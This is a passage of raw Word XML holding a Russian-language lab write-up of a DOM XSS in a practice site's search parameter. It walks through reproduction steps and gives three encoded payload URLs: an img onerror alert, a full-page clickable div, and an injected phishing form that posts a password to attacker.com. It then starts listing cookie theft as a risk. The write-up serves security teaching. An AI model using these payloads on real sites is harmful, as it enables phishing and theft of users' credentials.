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8D374" w14:textId="77A64EF7" w:rsidR="00B55DE4" w:rsidRDefault="00B55DE4" w:rsidP="00B55DE4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Задание 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5216ED18" w14:textId="36ACE670" w:rsidR="00B55DE4" w:rsidRDefault="00B55DE4" w:rsidP="00B55DE4">
      <w:pPr>
        <w:pStyle w:val="a5"/>
      </w:pPr>
      <w:r>
        <w:t>Разбор решения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27811B60" w14:textId="77777777" w:rsidR="00B55DE4" w:rsidRDefault="00B55DE4" w:rsidP="00B55DE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B55DE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55DE4">
        <w:t xml:space="preserve"> уязвимого ресурса: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="007563D3">
          <w:rPr>
            <w:rStyle w:val="ac"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidRPr="00B55DE4">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>://62.173.140.174:36101</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B55DE4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B55DE4">
        <w:br/>
      </w:r>
      <w:r>
        <w:t>Тип уязвимости</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55DE4">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55DE4">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B55DE4">
        <w:br/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Экран браузера в момент срабатывания </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EFDE45" w14:textId="77777777" w:rsidR="00B55DE4" w:rsidRDefault="00B55DE4" w:rsidP="00B55DE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B55DE4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7177222B" wp14:editId="1E32AD11">
            <wp:extent cx="5940425" cy="2251075"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="1437228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28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216E" w14:textId="77777777" w:rsidR="00B55DE4" w:rsidRDefault="00B55DE4" w:rsidP="00B55DE4">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>Шаги воспроизведения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5294E318" w14:textId="60244F18" w:rsidR="00B55DE4" w:rsidRDefault="00B55DE4" w:rsidP="00B55DE4">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ищем </w:t>
      </w:r>
      <w:r w:rsidRPr="00B55DE4">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>точку входа</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55DE4">
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и контекст. Для этого попробуем ввести любой текст в строку поиска и поискать его в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55DE4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>через инструменты разработчика.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C30E95D" w14:textId="77777777" w:rsidR="00CA3ADF" w:rsidRDefault="00CA3ADF" w:rsidP="00B55DE4">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Видим, что вводимая строка добавляется в верстку</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541F201B" w14:textId="678F4796" w:rsidR="00CA3ADF" w:rsidRDefault="00CA3ADF" w:rsidP="00CA3ADF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3ADF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EBA43F8" wp14:editId="17109086">
            <wp:extent cx="3568890" cy="1693460"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="921789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89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7808" cy="171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559A" w14:textId="401BD4D7" w:rsidR="00CA3ADF" w:rsidRPr="00CA3ADF" w:rsidRDefault="00CA3ADF" w:rsidP="00CA3ADF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Попытаемся найти источник</w:t>
      </w:r>
      <w:r w:rsidR="00695730">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00695730">
        <w:t>Р</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">аз значение подставляется из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, возможно, тут используется </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3ADF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5AE168" w14:textId="77777777" w:rsidR="00CA3ADF" w:rsidRDefault="00CA3ADF" w:rsidP="00CA3ADF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3ADF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25816B33" wp14:editId="045F89B6">
            <wp:extent cx="3589361" cy="1599577"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="825023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23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6817" cy="163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D205" w14:textId="77777777" w:rsidR="00695730" w:rsidRPr="00695730" w:rsidRDefault="00CA3ADF" w:rsidP="00CA3ADF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Видим контекст. Предполагаем возможный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PoC</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3ADF">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Например, можно сразу сделать вывод</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3ADF">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> что </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3ADF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3ADF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3ADF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CA3ADF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fetch</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3ADF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>(…)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CA3ADF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3ADF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3ADF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3ADF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">не подойдет, так как браузер блокирует в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA3ADF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA3ADF">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">эти теги. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4192DB34" w14:textId="47FC626C" w:rsidR="00695730" w:rsidRPr="00695730" w:rsidRDefault="00695730" w:rsidP="00CA3ADF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Введем</w:t>
      </w:r>
      <w:r w:rsidRPr="00695730">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00695730">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>поиск</w:t>
      </w:r>
      <w:r w:rsidRPr="00695730">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00695730">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00695730">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00695730">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00695730">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00695730">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00695730">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00695730">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>="alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00695730">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document.domain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00695730">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1735A8" w14:textId="77777777" w:rsidR="00695730" w:rsidRDefault="00695730" w:rsidP="00695730">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00695730">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="103D8184" wp14:editId="4F12E90B">
            <wp:extent cx="4742597" cy="1712506"/>
            <wp:effectExtent l="0" t="0" r="1270" b="2540"/>
            <wp:docPr id="1116576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76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5102" cy="17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247A" w14:textId="77777777" w:rsidR="00695730" w:rsidRDefault="00695730" w:rsidP="00695730">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00695730">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Использованные</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00695730">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00695730">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>полезные</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00695730">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00695730">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>нагрузки</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00695730">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (payloads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25118997" w14:textId="01F97703" w:rsidR="00695730" w:rsidRDefault="00695730" w:rsidP="00695730">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="007563D3">
          <w:rPr>
            <w:rStyle w:val="ac"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://62.173.1</w:t>
        </w:r>
        <w:r w:rsidRPr="007563D3">
          <w:rPr>
            <w:rStyle w:val="ac"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidRPr="007563D3">
          <w:rPr>
            <w:rStyle w:val="ac"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>0.174:36101/?q=%3Cimg+src%3Dx+onerror%3D%22alert%28document.domain%29%22%3E</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="29BB5469" w14:textId="6A40E043" w:rsidR="00D442A9" w:rsidRDefault="00D442A9" w:rsidP="00D442A9">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55E84F31" wp14:editId="567612DB">
            <wp:extent cx="3076076" cy="1876567"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="707157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57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356" cy="19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71C0" w14:textId="77777777" w:rsidR="00D442A9" w:rsidRDefault="00D442A9" w:rsidP="00D442A9">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39466B3C" w14:textId="77777777" w:rsidR="00AC2DC2" w:rsidRDefault="00AC2DC2" w:rsidP="00695730">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="007563D3">
          <w:rPr>
            <w:rStyle w:val="ac"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://62.173.140.174:36101/?q=%3Cdiv+style%3D%22position%3A+absolute%3B+z-index%3A+100%3B+width%3A+100vw%3</w:t>
        </w:r>
        <w:r w:rsidRPr="007563D3">
          <w:rPr>
            <w:rStyle w:val="ac"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>B</w:t>
        </w:r>
        <w:r w:rsidRPr="007563D3">
          <w:rPr>
            <w:rStyle w:val="ac"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>+height%3A+100vh%3B+top%3A0%3B+right%3A0%22+onclick%3D%22alert%28document.domain%29%22%3E%3C%2Fdiv%3E</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0526970F" w14:textId="63EB70AE" w:rsidR="00AC2DC2" w:rsidRDefault="00AC2DC2" w:rsidP="00AC2DC2">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2DC2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A4EB16E" wp14:editId="14AEBE2D">
            <wp:extent cx="5220269" cy="1516696"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1573717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17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409" cy="153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10AE" w14:textId="15D612CA" w:rsidR="004741F5" w:rsidRDefault="00AC2DC2" w:rsidP="004741F5">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2DC2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="654BBAFC" wp14:editId="2A3D74A7">
            <wp:extent cx="5302155" cy="2216080"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1349098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98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0143" cy="221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5DE4" w:rsidRPr="00AC2DC2">
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Данный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PoC</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2DC2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">добавляет </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2DC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2DC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>div</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2DC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2DC2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>элемент, растянутый на весь экран. При клике на любое место на странице – произойдет срабатывание вредоносного скрипта</w:t>
      </w:r>
      <w:r w:rsidR="00D442A9" w:rsidRPr="00D442A9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4ADD4F" w14:textId="4AA51ADF" w:rsidR="004741F5" w:rsidRDefault="00E80C6C" w:rsidP="004741F5">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="007563D3">
          <w:rPr>
            <w:rStyle w:val="ac"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://62.173.140.174:36101/?q=%3Cform+action%3D%22https%3A%2F%2Fattacker.com%22+style%3D%22position%3A+relative%3Bz-index%3A+100%3Bmargin-top%3A+-20px%3B%2F*+background%3A+var%28--bg%29%3B+*%2F%22%3E%3Cp+class%3D%22subtitle%22+style%3D%22background%3A+aliceblue%3Bwidth%3A+fit-content%3B%22%3E%D0%94%D0%BB%D1%8F+%D0%BA%D0%BE%D1%80%D1%80%D0%B5%D0%BA%D1%82%D0%BD%D0%BE%D0%B3%D0%BE+%D0%BF%D0%BE%D0%B8%D1%81%D0%BA%D0%B0+%D0%B2%D0%B2%D0%B5%D0%B4%D0%B8%D1%82%D0%B5+%D0%BF%D0%B0%D1%80%D0%BE%D0%BB%D1%8C%21%3C%2Fp%3E%3Cinput+placeholder%3D%22%D0%92%D0%B2%D0%B5%D0%B4%D0%B8%D1%82%D0%B5+%D0%BF%D0%B0%D1%80%D0%BE%D0%BB%D1%8C%22+style%3D%22+++++border%3A+1px+%23e5e7eb+solid%3B+++++border-radius%3A</w:t>
        </w:r>
        <w:r w:rsidRPr="007563D3">
          <w:rPr>
            <w:rStyle w:val="ac"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>+</w:t>
        </w:r>
        <w:r w:rsidRPr="007563D3">
          <w:rPr>
            <w:rStyle w:val="ac"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>12px%3B+++++width%3A+100%25%3B+++++padding%3A+14px%3B+%22%3E%3C%2Fform%3E</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="26D23F23" w14:textId="4B6A9142" w:rsidR="00E80C6C" w:rsidRPr="00E80C6C" w:rsidRDefault="00E80C6C" w:rsidP="00E80C6C">
      <w:pPr>
        <w:pStyle w:val="a7"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Данный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PoC</w:t>
      </w:r>
      <w:r w:rsidRPr="00E80C6C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">добавляет фишинговую форму на сайт. Для более короткой ссылки можно воспользоваться различными сервисами для коротких ссылок. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E80C6C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="525362F3" wp14:editId="1DF7E8A7">
            <wp:extent cx="5186149" cy="2068915"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1913408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08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212" cy="207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65E8" w14:textId="0FF758C4" w:rsidR="00D442A9" w:rsidRDefault="00D442A9" w:rsidP="00D442A9">
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D442A9">
        <w:t>Краткий разбор риска</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EE6AE5" w14:textId="4FFC0308" w:rsidR="00D442A9" w:rsidRDefault="00D442A9" w:rsidP="00D442A9">
      <w:r>
        <w:t xml:space="preserve">В реальном приложении, при знании </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>эндпоинтов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> сервиса, можно выполнить от имени пользователя различные действия. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B411DA9" w14:textId="4B402348" w:rsidR="00D442A9" w:rsidRPr="00D442A9" w:rsidRDefault="00D442A9" w:rsidP="00D442A9">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Украсть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00D442A9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>пользователя</w:t>
      </w:r>
      <w:r w:rsidRPr="00D442A9">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D442A9">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D442A9">
        <w:rPr>
